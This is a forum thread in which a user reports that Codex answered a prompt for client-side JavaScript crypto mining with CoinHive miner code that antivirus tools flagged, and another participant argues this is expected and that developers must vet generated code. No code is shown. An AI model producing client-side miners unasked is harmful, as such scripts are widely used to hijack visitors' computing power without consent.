Hello, I would like to alert you to a particularly worrying security problem when using Codex.
I ask to AI this one:
/* Script to mine crypto in client-side JS */
Codex has generated a code using CoinHive.
Initially it was detected as a Trojan by the PC antivirus. But here is the report that I reproduced afterwards thanks to Virus Total: VirusTotal (31/60 malicious detections).
Have you ever thought about this type of problem? This is the first big problem I encountered, otherwise Codex is rather interesting to start a project and correct some algorithmic misunderstandings (or import libraries in particular).
To be honest, I don’t see any problem in this completion.
It generated a JS script for a CoinHive miner, just like you asked it to do.
Of course it will flag it in VirusTotal or almost any AV, since it is a crypto miner. It is not a virus or malware, if you know what it does: Mine crypto.
No, I don’t ask to generate a CoinHive miner … I ask a JS script to mine crypto. It’s really different. And result it’s a bad script, uploaded on internet and scrapped by Codex to learn.
This example is really low security problem, I’m okay with that. But maybe something is really most bad and I can imagine a basic developper who doesn’t know what the script do (all it takes is a small security hole). Can Codex forget some codes? How is this security aspect thought out?
Afaik Codex is not made to generate security-proof code, it just helps to generate snippets. Maybe in the future, but not right now.
You, as a developer, are still in charge to verify the generated code.
Also, generating a miner from scratch, without using any library, is complicated and would also generate A LOT of code. Since Codex is trained on open-source projects, it will snip together things from public repositories.
I still see no real issue with it.